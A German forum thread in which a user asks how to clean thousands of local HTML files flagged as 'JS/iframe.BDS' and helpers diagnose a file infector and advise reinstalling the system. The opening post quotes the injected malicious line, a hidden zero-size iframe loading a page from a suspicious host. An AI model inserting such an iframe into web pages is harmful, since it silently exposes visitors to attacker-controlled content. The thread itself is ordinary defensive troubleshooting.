Hallo,
Avira findet 9577 infizierte HTML-Dateien auf meinem Rechner. Alle enthalten den Trojan "JS/iframe.BDS". Es handelt sich um lokale Webseiten eines ziemlich großen (ca. 50GB) Softwarepakets. Wenn ich die alle in den Virenkäfig sperre, kann ich die Software nicht mehr benutzen.

Die Webseiten enthalten immer dieselbe Zeile, und sie wurde HINTER dem HTML-Teil angefügt:

<HTML>
...
<HTML>
<iframe src=hxxp://www.3-0b6f-415d-b5c7-832f0.com:888/tj.htm width=0 height=0></iframe>

Kann sie dort überhaupt etwas bewirken?

Gibt es eine einfache Möglichkeit, den Trojaner-Code aus den betroffenen Webseiten zu entfernen? Ich meine nicht von Hand mit notepad.exe oder so.

Viele Grüße,
Ilios

EDIT: mit SearchReplaceMaster geht das glaub ich, und mit diesem Monstereditor, der in LISP geschrieben wurde, wie heißt der gleich noch?

EDIT2: ach ja, EMACS, aber dafür braucht man einen Führerschein. SearchReplaceMaster ist glaub ich einfacher, werd's nachher mal probieren.

hi
gabs noch andere Funde? ich würd mal behaupten, ihr habt einen file infektior auf dem pc, bzw evtl. falls firmen netz, im netzwerk (virus.Viking)

Na ja, ich hab schon so einiges beseitigt. Angefangen hat alles mit einem Silly-Worm (WORM_VB.EQW) auf einem USB-Laufwerk. Ich dachte eigentlich, ich hätte Autostart ausgeschaltet, aber es muss wohl bei Systembereinigungsarbeiten wieder aktiviert worden sein.

Weil Avira den Silly nicht erkannt hat, hab ich Malwarebytes installiert. Der hat auch noch allerhand anderes böses Zeugs gefunden und beseitigt (Logfile hab ich noch).

Auf dem USB-Laufwerk war ein virtuelles System (vmplayer). Darin hab ich auch Malwarebytes installiert und laufen lassen, mit dem gleichen Ergebnis.

Dann habe ich das Programmpaket aus dem virtuellen System mit PCmover auf das Host-System übertragen. Erst da hat Avira die infizierten HTML-Dateien entdeckt.

Nun könnte man ja PCmover verdächtigen, ist aber sauber (sagt Avira).

Gruß,
Ilios

du kannst das system neu aufsetzen, du hast ein file infektor, den bekommst du nicht sicher aus dem system, da er sich an einige datei typen anhängt, und usb sticks würd ich auch nicht verwenden, die du an dem betroffenen system hattest, die sind wohl auch infiziert.
ist das n firmen gerät? bist du da der admin oder habt ihr ne it?

Das ist auf einem Laptop, ich wurschtele ganz allein, ohne IT Abteilung :-)

Ein anderer Laptop, wo ich das Laufwerk mal "angesteckt" hatte, war dadurch auch infiziert worden, aber den hab ich mit Malwarebytes wieder clean bekommen. Andere Scanner finden da auch nichts mehr.

Also, ob der Silly-Worm den JS/Iframe.BDS übertragen hat, glaube ich eigentlich auch nicht, die Iframes könnten schon länger drauf gewesen sein.

Hi,
glauben ist hier auch nicht nötig, ich weis, dass diese einträge von den file infektoren stammen, die kannst du auch nicht mit malware bytes aufspüren bzw kann malware bytes solche Dateien gar nicht bereinigen.
alle sticks, die während der infektion angeschlossen waren, an beiden geräten, dürfen nicht an andere geräte, sie müssen formatiert werden.
auch die beiden Laptops
als firma hast du hoffendlich backups?